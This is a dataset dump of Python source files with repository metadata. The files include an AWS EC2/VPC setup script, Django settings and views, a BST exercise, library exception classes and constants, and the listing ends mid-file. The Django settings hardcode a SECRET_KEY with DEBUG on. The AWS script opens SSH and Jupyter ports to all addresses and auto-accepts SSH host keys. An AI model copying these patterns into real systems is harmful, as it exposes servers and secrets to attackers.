Dataset schema (one row per source file):

| Column | Type | Range / distinct values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3–616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 (nullable, ⌀) | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] (nullable, ⌀) | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable, ⌀) | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | string | 188 classes |
| content | string | length 3 – 10.2M |
| authors | list | length 1 |
| author_id | string | length 1–132 |

The rows below follow this column order, with cells separated by `|`.
d3ec5b088a135db2f9b6e929ee4d35e3c6dee45b
|
4f510470b3093ab2c60f929221af82c79b121ca7
|
/python_net/day6/clock.py
|
c2d5b6098c3805e3c03231421859c85e08e5ae48
|
[] |
no_license
|
q737645224/python3
|
ce98926c701214f0fc7da964af45ba0baf8edacf
|
4bfabe3f4bf5ba4133a16102c51bf079d500e4eb
|
refs/heads/master
| 2020-03-30T07:11:17.202996 | 2018-10-30T06:14:51 | 2018-10-30T06:14:51 | 150,921,088 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 409 |
py
|
from multiprocessing import Process
import time
class ClockProcess(Process):
def __init__(self,value):
        # call the parent class __init__
super().__init__()
self.value = value
    # override the run method
def run(self):
for i in range(5):
time.sleep(self.value)
print("The time is {}".format(time.ctime()))
p = ClockProcess(2)
# start() automatically invokes run
p.start()
p.join()
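# Expected behavior (for reference): the child process prints the current
# time five times, once every two seconds, then the parent joins it.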
|
[
"[email protected]"
] | |
1d2507a1c919eb50f1f0b17dac4098ce8f506800
|
bab18992fe3265a2eacfb08f1c6241188f7ac225
|
/python_scripts/aws_setup.py
|
5e1d0d48d09784027693118b457be8c81b5dca82
|
[
"Apache-2.0"
] |
permissive
|
sjdlloyd/imagenet-fast
|
5978597f43d29cab0a430aa1128eadd1abc3e4f9
|
edfa49711c9d0076f40352badf4179c4e53f347a
|
refs/heads/master
| 2020-03-07T07:39:47.641129 | 2018-03-29T23:08:13 | 2018-03-29T23:08:13 | 127,355,266 | 0 | 0 |
Apache-2.0
| 2018-03-29T22:50:04 | 2018-03-29T22:50:04 | null |
UTF-8
|
Python
| false | false | 10,202 |
py
|
import argparse
import boto3
import paramiko
import os, sys, time
from pathlib import Path
session = boto3.Session()
ec2 = session.resource('ec2')
ec2c = session.client('ec2')
def get_vpc(name):
vpcs = list(ec2.vpcs.filter(Filters=[{'Name': 'tag-value', 'Values': [name]}]))
return vpcs[0] if vpcs else None
def get_instance(name):
instances = list(ec2.instances.filter(Filters=[{'Name': 'tag-value', 'Values': [name]}]))
return instances[0] if instances else None
def get_vpc_info(vpc):
try:
vpc_tag_name = list(filter(lambda i: i['Key'] == 'Name', vpc.tags))[0]['Value']
sg = list(vpc.security_groups.filter(Filters=[{'Name': 'group-name', 'Values': [f'{vpc_tag_name}-security-group']}]))[0]
subnet = list(vpc.subnets.filter(Filters=[{'Name': 'tag-value', 'Values': [f'{vpc_tag_name}-subnet']}]))[0]
    except Exception as e:
        print('Could not get VPC info: ', e)
        return None, None  # avoid a NameError on sg/subnet below
    return sg.id, subnet.id
def get_vpc_ids(name):
vpc = get_vpc(name)
if vpc is None: return None
sg_id, subnet_id = get_vpc_info(vpc)
return vpc.id, sg_id, subnet_id
def create_ec2_keypair(name):
ssh_dir = Path.home()/'.ssh'
ssh_dir.mkdir(exist_ok=True)
keypair_name = f'aws-key-{name}'
filename = ssh_dir/f'{keypair_name}.pem'
if filename.exists():
print('Keypair exists')
return
keypair = ec2.create_key_pair(KeyName=keypair_name)
keypair_out = keypair.key_material
outfile = open(filename,'w')
outfile.write(keypair_out)
os.chmod(filename, 0o400)
print('Created keypair')
def get_ssh_command(instance):
return f'ssh -i ~/.ssh/{instance.key_name}.pem ubuntu@{instance.public_ip_address}'
def create_vpc(name):
cidr_block='10.0.0.0/28'
vpc = ec2.create_vpc(CidrBlock=cidr_block)
vpc.modify_attribute(EnableDnsSupport={'Value':True})
vpc.modify_attribute(EnableDnsHostnames={'Value':True})
vpc.create_tags(Tags=[{'Key':'Name','Value':name}])
ig = ec2.create_internet_gateway()
ig.attach_to_vpc(VpcId=vpc.id)
ig.create_tags(Tags=[{'Key':'Name','Value':f'{name}-gateway'}])
subnet = vpc.create_subnet(CidrBlock=cidr_block)
subnet.create_tags(Tags=[{'Key':'Name','Value':f'{name}-subnet'}])
# TODO: enable public ip?
# subnet.meta.client.modify_subnet_attribute(SubnetId=subnet.id, MapPublicIpOnLaunch={"Value": True})
rt = vpc.create_route_table()
rt.create_tags(Tags=[{'Key':'Name','Value':f'{name}-route-table'}])
rt.associate_with_subnet(SubnetId=subnet.id)
rt.create_route(DestinationCidrBlock='0.0.0.0/0', GatewayId=ig.id)
cidr = '0.0.0.0/0'
    sg = vpc.create_security_group(GroupName=f'{name}-security-group', Description=f'SG for {name} machine')
# ssh
sg.authorize_ingress(IpProtocol='tcp', FromPort=22, ToPort=22, CidrIp=cidr)
# jupyter notebook
sg.authorize_ingress(IpProtocol='tcp', FromPort=8888, ToPort=8898, CidrIp=cidr)
# allow efs
IpPermissions=[{
'FromPort': 2049,
'ToPort': 2049,
'IpProtocol': 'tcp',
'UserIdGroupPairs': [{ 'GroupId': sg.id }],
}]
sg.authorize_ingress(IpPermissions=IpPermissions)
return vpc
def get_ami(region=None):
if region is None: region = session.region_name
region2ami = {
'us-west-2': 'ami-8c4288f4',
'eu-west-1': 'ami-b93c9ec0',
'us-east-1': 'ami-c6ac1cbc'
}
return region2ami[region]
def allocate_vpc_addr(instance_id):
alloc_addr = ec2c.allocate_address(Domain='vpc')
ec2c.associate_address(InstanceId=instance_id, AllocationId=alloc_addr['AllocationId'])
return alloc_addr
def create_instance(name, launch_specs):
instance = ec2.create_instances(ImageId=launch_specs['ImageId'], InstanceType=launch_specs['InstanceType'],
MinCount=1, MaxCount=1,
KeyName=launch_specs['KeyName'],
BlockDeviceMappings=launch_specs['BlockDeviceMappings'],
NetworkInterfaces=launch_specs['NetworkInterfaces']
)[0]
instance.create_tags(Tags=[{'Key':'Name','Value':f'{name}'}])
print('Instance created...')
instance.wait_until_running()
print('Creating public IP address...')
addr_id = allocate_vpc_addr(instance.id)['AllocationId']
print('Rebooting...')
instance.reboot()
instance.wait_until_running()
    print('Completed. SSH:', get_ssh_command(instance))
return instance
def wait_on_fulfillment(req_status):
while req_status['State'] != 'active':
        print('Waiting on spot fulfillment...')
time.sleep(5)
req_statuses = ec2c.describe_spot_instance_requests(Filters=[{'Name': 'spot-instance-request-id', 'Values': [req_status['SpotInstanceRequestId']]}])
req_status = req_statuses['SpotInstanceRequests'][0]
if req_status['State'] == 'failed' or req_status['State'] == 'closed':
print('Spot instance request failed:', req_status['Status'])
return None
instance_id = req_status['InstanceId']
    print('Fulfillment completed. InstanceId:', instance_id)
return instance_id
def get_spot_prices():
hist = ec2c.describe_spot_price_history()['SpotPriceHistory']
return {h['InstanceType']:h['SpotPrice'] for h in hist}
class LaunchSpecs:
def __init__(self, vpc, instance_type='t2.micro'):
self.ami = get_ami()
self.sg_id, self.subnet_id = get_vpc_info(vpc)
self.instance_type = instance_type
self.device = '/dev/sda1'
self.volume_size = 100
self.volume_type = 'gp2'
self.vpc_tagname = list(filter(lambda i: i['Key'] == 'Name', vpc.tags))[0]['Value']
self.keypair_name = f'aws-key-{self.vpc_tagname}'
def build(self):
launch_specification = {
'ImageId': self.ami,
'InstanceType': self.instance_type,
'KeyName': self.keypair_name,
'NetworkInterfaces': [{
'DeviceIndex': 0,
'SubnetId': self.subnet_id,
'Groups': [self.sg_id],
'AssociatePublicIpAddress': True
}],
'BlockDeviceMappings': [{
'DeviceName': '/dev/sda1',
'Ebs': {
# Volume size must be greater than snapshot size of 80
'VolumeSize': self.volume_size,
'DeleteOnTermination': True,
'VolumeType': self.volume_type
}
}]
}
return launch_specification
def create_spot_instance(name, launch_specs, spot_price='0.5'):
spot_requests = ec2c.request_spot_instances(SpotPrice=spot_price, LaunchSpecification=launch_specs)
spot_request = spot_requests['SpotInstanceRequests'][0]
    instance_id = wait_on_fulfillment(spot_request)
print('Rebooting...')
instance = list(ec2.instances.filter(Filters=[{'Name': 'instance-id', 'Values': [instance_id]}]))[0]
instance.reboot()
instance.wait_until_running()
instance.create_tags(Tags=[{'Key':'Name','Value':f'{name}'}])
    print('Completed. SSH:', get_ssh_command(instance))
return instance
def create_efs(name, vpc):
sg_id, subnet_id = get_vpc_info(vpc)
efsc = session.client('efs')
efs_response = efsc.create_file_system(CreationToken=f'{name}', PerformanceMode='generalPurpose')
efs_id = efs_response['FileSystemId']
efsc.create_tags(FileSystemId=efs_id, Tags=[{'Key': 'Name', 'Value': f'{name}'}])
mount_target = efsc.create_mount_target(FileSystemId=efs_id,
SubnetId=subnet_id,
SecurityGroups=[sg_id])
return efs_response
def get_efs_address(name):
efsc = session.client('efs')
file_systems = efsc.describe_file_systems()['FileSystems']
target = list(filter(lambda x: x['Name'] == name, file_systems))
if target:
fs_id = target[0]['FileSystemId']
region = session.region_name
return f'{fs_id}.efs.{region}.amazonaws.com'
def attach_volume(instance, volume_tag, device='/dev/xvdf'):
volumes = list(ec2.volumes.filter(Filters=[{'Name': 'tag-value', 'Values': [volume_tag]}]))
if not volumes: print('Could not find volume for tag:', volume_tag); return
instance.attach_volume(Device=device, VolumeId=volumes[0].id)
instance.reboot()
instance.wait_until_running()
print('Volume attached. Please make sure to ssh into instance to format (if new volume) and mount')
# TODO: need to make sure ebs is formatted correctly inside the instance
return instance
def create_volume(name, size=120, volume_type='gp2'):
tag_specs = [{
'Tags': [{
'Key': 'Name',
'Value': f'{name}'
}]
}]
volume = ec2.create_volume(Size=size, VolumeType=volume_type, TagSpecifications=tag_specs)
return volume
def connect_to_instance(instance, keypath=f'{Path.home()}/.ssh/aws-key-fast-ai.pem', username='ubuntu', timeout=10):
print('Connecting to SSH...')
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 20
while retries > 0:
try:
client.connect(instance.public_ip_address, username=username, key_filename=keypath, timeout=timeout)
print('Connected!')
break
except Exception as e:
print(f'Exception: {e} Retrying...')
retries = retries - 1
time.sleep(10)
return client
def run_command(client, cmd, inputs=[]):
stdin, stdout, stderr = client.exec_command(cmd, get_pty=True)
for inp in inputs:
# example = 'mypassword\n'
stdin.write(inp)
stdout_str = stdout.read().decode('utf8')
stderr_str = stderr.read().decode('utf8')
print("run_command returned: \n" + stdout_str)
return stdout_str, stderr_str
def upload_file(client, localpath, remotepath):
# file = f'{Path.home()}/Projects/ML/fastai/fastai_imagenet/testfile.txt'
ftp_client=client.open_sftp()
ftp_client.put(localpath, remotepath)
ftp_client.close()
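# A minimal end-to-end sketch of how these helpers compose (names are
# illustrative; assumes AWS credentials and a default region are configured):
#   create_ec2_keypair('fast-ai')
#   vpc = get_vpc('fast-ai') or create_vpc('fast-ai')
#   specs = LaunchSpecs(vpc, instance_type='t2.micro').build()
#   instance = create_instance('fast-ai-box', specs)
#   client = connect_to_instance(instance)
#   run_command(client, 'uname -a')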
|
[
"[email protected]"
] | |
8ab39253c3c68371ad76627741d0833f97e1c4b5
|
3929d114c1bc6aef86402300a8d5b278849d41ae
|
/701. Insert into a Binary Search Tree.py
|
5abb58bce2b3ff9cf773ac80caf45a589b4e5a5e
|
[] |
no_license
|
lxyshuai/leetcode
|
ee622235266017cf18da9b484f87c1cf9ceb91d0
|
5f98270fbcd2d28d0f2abd344c3348255a12882a
|
refs/heads/master
| 2020-04-05T21:29:37.140525 | 2018-12-16T13:17:15 | 2018-12-16T13:17:15 | 157,222,620 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,551 |
py
|
"""
Given the root node of a binary search tree (BST) and a value to be inserted into the tree, insert the value into the BST. Return the root node of the BST after the insertion. It is guaranteed that the new value does not exist in the original BST.
Note that there may exist multiple valid ways for the insertion, as long as the tree remains a BST after insertion. You can return any of them.
For example,
Given the tree:
4
/ \
2 7
/ \
1 3
And the value to insert: 5
You can return this binary search tree:
4
/ \
2 7
/ \ /
1 3 5
This tree is also valid:
5
/ \
2 7
/ \
1 3
\
4
"""
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def insertIntoBST(self, root, val):
"""
:type root: TreeNode
:type val: int
:rtype: TreeNode
"""
def process(root, val):
if root.val > val:
if root.left:
process(root.left, val)
else:
root.left = TreeNode(val)
elif root.val < val:
if root.right:
process(root.right, val)
else:
root.right = TreeNode(val)
return root
if root is None:
return TreeNode(val)
return process(root, val)
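if __name__ == '__main__':
    # A quick check using the docstring's example (added for illustration):
    # insert 5 into the tree 4 / (2, 7) / (1, 3, _).
    root = TreeNode(4)
    root.left = TreeNode(2)
    root.right = TreeNode(7)
    root.left.left = TreeNode(1)
    root.left.right = TreeNode(3)
    root = Solution().insertIntoBST(root, 5)
    assert root.right.left.val == 5  # 5 lands as the left child of 7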
|
[
"[email protected]"
] | |
dc309c761d457be4dcea5b7d6967cc27013e4e07
|
209a7a4023a9a79693ec1f6e8045646496d1ea71
|
/COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/aniso8601/exceptions.py
|
887cfbd010261406a1330c553a6636ff210ef2f6
|
[
"MIT"
] |
permissive
|
anzhao920/MicrosoftProject15_Invictus
|
5e2347015411bbffbdf0ceb059df854661fb240c
|
15f44eebb09561acbbe7b6730dfadf141e4c166d
|
refs/heads/main
| 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 |
MIT
| 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null |
UTF-8
|
Python
| false | false | 1,182 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2021, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
class ISOFormatError(ValueError):
"""Raised when ISO 8601 string fails a format check."""
class NegativeDurationError(ValueError):
"""Raised when a duration is negative."""
class YearOutOfBoundsError(ValueError):
"""Raised when year exceeds limits."""
class WeekOutOfBoundsError(ValueError):
"""Raised when week exceeds a year."""
class DayOutOfBoundsError(ValueError):
"""Raised when day is outside of 1..365, 1..366 for leap year."""
class HoursOutOfBoundsError(ValueError):
    """Raised when parsed hours are greater than 24."""
class MinutesOutOfBoundsError(ValueError):
    """Raised when parsed minutes are greater than 60."""
class SecondsOutOfBoundsError(ValueError):
    """Raised when parsed seconds are greater than 60."""
class MidnightBoundsError(ValueError):
    """Raised when parsed time has an hour of 24 but is not midnight."""
class LeapSecondError(NotImplementedError):
"""Raised when attempting to parse a leap second"""
|
[
"[email protected]"
] | |
c2e612ddf1c155b9790bbcbab3b932deecd1ebe2
|
dddbf58aa36d9779f1e50e2d761e93fb7580b835
|
/settings.py
|
9d107f569ede8b4149aab50b91ae1c74772489af
|
[] |
no_license
|
powellc/lobby_slideshow
|
7566933707554b1f4188bd116fcdf51668442d0d
|
b1fc222c14dd4a9bda5665a7ade6dbe1a20b7d1d
|
refs/heads/master
| 2021-01-02T22:19:23.065149 | 2014-03-07T19:51:33 | 2014-03-07T19:51:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,516 |
py
|
# Django settings for lobby_adamsschool_com project.
import os
import sys
gettext = lambda s: s
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
PUBLIC_DIR = os.path.join(PROJECT_PATH, 'public')
LOBBY_HOME = os.path.join(PUBLIC_DIR, 'lobby')
sys.path.insert(0, os.path.join(PROJECT_PATH, "apps"))
ADMINS = (
('Colin Powell', '[email protected]'),
)
MANAGERS = ADMINS
TIME_ZONE = 'America/New_York'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
gettext_noop = lambda s: s
LANGUAGES = [
('en', gettext_noop('English')),
]
MEDIA_ROOT = os.path.join(LOBBY_HOME, 'media')
STATIC_ROOT = os.path.join(PUBLIC_DIR, 'static')
MEDIA_URL = "/media/"
STATIC_URL = '/static/'
ADMIN_MEDIA_PREFIX = os.path.join(PUBLIC_DIR, "static/admin")
THUMBNAIL_BASEDIR = 'cache'
from imp import find_module
STATICFILES_DIRS = (
os.path.join(os.path.abspath(find_module("debug_toolbar")[1]), 'media'),
os.path.join(os.path.abspath(find_module("superslides")[1]), 'media'),
os.path.join(PROJECT_PATH, 'static'),
)
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'lobby_slideshow.wsgi.application'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
DEBUG_TOOLBAR_MEDIA_ROOT = os.path.join(STATIC_ROOT, 'debug_toolbar')
# Make this unique, and don't share it with anybody.
SECRET_KEY = '=uwxb__g7_w1f7kqznn4fddmgo-y(6)x@fn2lxq(lptb0pqj09'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
    os.path.join(PROJECT_PATH, "templates"),  # trailing comma: must be a tuple, not a str
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
'south',
'django_extensions',
'debug_toolbar',
'superslides',
'easy_thumbnails',
)
SUPERSLIDES_ROOT = 'slides'
SUPERSLIDES_SLIDE_SIZE = '1300x800'
THUMBNAIL_ALIASES = {
'': {
'slideshow': {'size': (1300, 800), 'crop': False},
},
}
TINYMCE_DEFAULT_CONFIG = {
'plugins': "table,spellchecker,paste,searchreplace",
'theme': "advanced",
}
TINYMCE_SPELLCHECKER = True
TINYMCE_COMPRESSOR = True
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
from local_settings import *
|
[
"[email protected]"
] | |
efacaba6ff291bba29e7c9f3869a4f4493c615f2
|
65b265426676b9e5ea72e6787ad82fab3446920a
|
/main.py
|
28c53eef4aa2d4e2ec7677b58da224206510035d
|
[] |
no_license
|
podder-ai/podder-task-sample-tessaract
|
47c3687a1d9483f29d9f1b913ddddb2ccfcc2606
|
ef8dfa723e0d3dba81363982ab9152c5bfea46e0
|
refs/heads/master
| 2022-12-02T13:24:05.814188 | 2019-11-17T04:46:33 | 2019-11-17T04:46:33 | 222,094,410 | 0 | 0 | null | 2022-11-22T04:50:00 | 2019-11-16T12:14:30 |
Python
|
UTF-8
|
Python
| false | false | 259 |
py
|
import uuid
from app.task import Task
from podder_task_foundation import MODE
DAG_ID = "___dag_id___"
def main() -> None:
task = Task(MODE.CONSOLE)
job_id = str(uuid.uuid1())
task.handle(job_id, DAG_ID)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
ed6d9c2ba7ef83ea5ce9da0efe39162f598deded
|
1548ce77537dcd50ab04b0eaee050b5d30553e23
|
/autotabular/constants.py
|
c0ad9e5d846e8aca277e0a36426e69307ed79833
|
[
"Apache-2.0"
] |
permissive
|
Shamoo100/AutoTabular
|
4a20e349104246bf825ebceae33dca0a79928f2e
|
7d71bf01d2b7d84fcf5f65c9f45c5cea1255d8a2
|
refs/heads/main
| 2023-08-13T21:34:34.329888 | 2021-10-02T07:06:00 | 2021-10-02T07:06:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 920 |
py
|
BINARY_CLASSIFICATION = 1
MULTICLASS_CLASSIFICATION = 2
MULTILABEL_CLASSIFICATION = 3
REGRESSION = 4
MULTIOUTPUT_REGRESSION = 5
REGRESSION_TASKS = [REGRESSION, MULTIOUTPUT_REGRESSION]
CLASSIFICATION_TASKS = [
BINARY_CLASSIFICATION, MULTICLASS_CLASSIFICATION, MULTILABEL_CLASSIFICATION
]
TASK_TYPES = REGRESSION_TASKS + CLASSIFICATION_TASKS
TASK_TYPES_TO_STRING = \
{BINARY_CLASSIFICATION: 'binary.classification',
MULTICLASS_CLASSIFICATION: 'multiclass.classification',
MULTILABEL_CLASSIFICATION: 'multilabel.classification',
REGRESSION: 'regression',
MULTIOUTPUT_REGRESSION: 'multioutput.regression'}
STRING_TO_TASK_TYPES = \
{'binary.classification': BINARY_CLASSIFICATION,
'multiclass.classification': MULTICLASS_CLASSIFICATION,
'multilabel.classification': MULTILABEL_CLASSIFICATION,
'regression': REGRESSION,
'multioutput.regression': MULTIOUTPUT_REGRESSION}
|
[
"[email protected]"
] | |
438d6c4940c8513fdd919f483d63f2bfc6b96bc8
|
b767d5e8c5a32d360196ff3b89efc42dce0071b3
|
/blog/acl/views.py
|
deae34df69b4570befe5e51dbec27d7a352187c5
|
[] |
no_license
|
wangjiancn/back-end_blog
|
749d40a1c447975408a5538c33ac334d826d5d2c
|
da79506169573df7d48784f5f109be61e59edc7b
|
refs/heads/master
| 2022-12-11T06:34:17.641252 | 2020-04-13T13:13:35 | 2020-04-13T14:24:26 | 186,651,614 | 1 | 0 | null | 2022-05-25T02:48:28 | 2019-05-14T15:35:24 |
Python
|
UTF-8
|
Python
| false | false | 813 |
py
|
import json
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import authenticate
from .models import UserProfile
from .auth_wrap import token_required
from utils.api_response import APIResponse, APIResponseError
@require_POST
@csrf_exempt
def register(r):
"""注册"""
data = json.loads(r.body)
user = UserProfile.objects.create_user(**data)
return APIResponse(user.token)
@csrf_exempt
@require_POST
def login(r):
"""登录"""
data = json.loads(r.body)
user = authenticate(**data)
if user is not None:
return APIResponse(user.token)
else:
return APIResponseError(10005)
@token_required
@require_POST
@csrf_exempt
def logout(r):
"""注销"""
return APIResponse()
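# Example payloads (illustrative; the accepted fields depend on
# UserProfile.objects.create_user and authenticate):
#   POST /register  {"username": "alice", "password": "s3cret"}  -> token
#   POST /login     {"username": "alice", "password": "s3cret"}  -> token
#   POST /logout    with the auth token header checked by @token_required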
|
[
"[email protected]"
] | |
68fff833f3fd4310916ca1b8d9065f46d4002a05
|
9cc1b58d0319308da98187d071295b2fabf1f080
|
/TQC_考題練習/b0526_TQC證照_301.py
|
37df2111df4e754b9ad91e97a2c89db29fd43817
|
[
"MIT"
] |
permissive
|
Arwen0905/Python_Test
|
60d1dee383c9cf27df6b93cfde7884c91092229c
|
c75357e4354a684a9fae41f751dae60d4cf0716c
|
refs/heads/master
| 2023-01-13T13:14:55.355898 | 2020-10-31T18:52:07 | 2020-10-31T18:52:07 | 265,150,874 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 798 |
py
|
# 1. Problem description:
# Open the file PYD301.py and complete it according to the
# requirements below, computing a sum from the inputs so that
# the output matches the specification.
# When done, save it as PYA301.py before submitting for grading.
# 2. Design notes:
# Using a loop, write a program that reads two positive
# integers a and b (with a < b) and computes the sum of the
# integers from a through b.
# For example: for a=1, b=100,
# the output is 5050 (1 + 2 + ... + 100 = 5050).
# 3. Input / output:
# Input description
# Two positive integers (a and b, with a < b)
# Output description
# The sum of the integers from a through b
# Sample I/O
# Sample input
# 66
# 666
# Sample output
# 219966
# TODO
a = int(input())
b = int(input())
# a,b = 66,666
ans = 0
if a<b:
for i in range(a, b+1):
ans+=i
print(ans)
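# Cross-check with the closed form: (a + b) * (b - a + 1) // 2 = 219966 for a=66, b=666.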
|
[
"[email protected]"
] | |
831feaf2beaa8177145bc39ad2ed5b7309728577
|
e61e8f906b7f1de60fca47ac01293ef695d22a9b
|
/home/migrations/0003_auto_20181127_2103.py
|
c688484ad34957611673fae6c50c61d7c7a3a693
|
[] |
no_license
|
redcliver/marioseguros
|
e5f775d129a201e80a55f7ac266952e41ecb9079
|
da0aeb3b2625dd0ce35e074d94231066a9483501
|
refs/heads/master
| 2020-03-30T02:40:21.419727 | 2019-02-04T14:19:36 | 2019-02-04T14:19:36 | 150,642,755 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,504 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-11-27 21:03
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('home', '0002_auto_20181127_0958'),
]
operations = [
migrations.AddField(
model_name='cliente',
name='inscricao',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='bairro',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cep',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cidade',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cpf',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='data_nasc',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, null=True),
),
migrations.AlterField(
model_name='cliente',
name='endereco',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AlterField(
model_name='cliente',
name='estado',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='cliente',
name='numero',
field=models.CharField(blank=True, max_length=6, null=True),
),
migrations.AlterField(
model_name='cliente',
name='rg',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='rg_uf',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='venc_habilitacao',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, null=True),
),
]
|
[
"[email protected]"
] | |
5e0ef252f9b0c83b10c62836004ad7774ad55827
|
377420d718094a37da2e170718cecd80435d425a
|
/google/ads/googleads/v4/services/types/user_interest_service.py
|
e0da2b7489e7318a888329e4829469e8b0cd7f31
|
[
"Apache-2.0"
] |
permissive
|
sammillendo/google-ads-python
|
ed34e737748e91a0fc5716d21f8dec0a4ae088c1
|
a39748521847e85138fca593f3be2681352ad024
|
refs/heads/master
| 2023-04-13T18:44:09.839378 | 2021-04-22T14:33:09 | 2021-04-22T14:33:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,219 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v4.services",
marshal="google.ads.googleads.v4",
manifest={"GetUserInterestRequest",},
)
class GetUserInterestRequest(proto.Message):
r"""Request message for
[UserInterestService.GetUserInterest][google.ads.googleads.v4.services.UserInterestService.GetUserInterest].
Attributes:
resource_name (str):
Required. Resource name of the UserInterest
to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1)
__all__ = tuple(sorted(__protobuf__.manifest))
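# A minimal construction sketch (the resource name format is assumed):
#   request = GetUserInterestRequest(
#       resource_name="customers/1234567890/userInterests/123",
#   )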
|
[
"[email protected]"
] | |
429b151fd242a071d82942054526cb5f29dacb65
|
e7a48c161eabd4b941f4cc29a8064c5ba2ec1aa3
|
/project/apps/tables/views.py
|
7c1987ac8cb055cb7b9fd7144915232a31822d6e
|
[] |
no_license
|
MauricioDinki/mesa-regalos
|
7d3d7968990323a828dd58107045d12db1f005a3
|
66dbb879421a2f563b731154462e526036f9d957
|
refs/heads/master
| 2022-12-12T06:04:36.508639 | 2019-05-30T07:23:21 | 2019-05-30T07:23:21 | 189,360,356 | 0 | 0 | null | 2022-12-08T05:11:50 | 2019-05-30T06:41:55 |
Python
|
UTF-8
|
Python
| false | false | 3,218 |
py
|
from django.contrib import messages
from django.http import Http404
from django.shortcuts import redirect
from django.template.response import TemplateResponse
from django.urls import reverse, reverse_lazy
from django.views import View
from django.views.generic import FormView, DeleteView, UpdateView, TemplateView
from project.apps.gifts.models import Gift
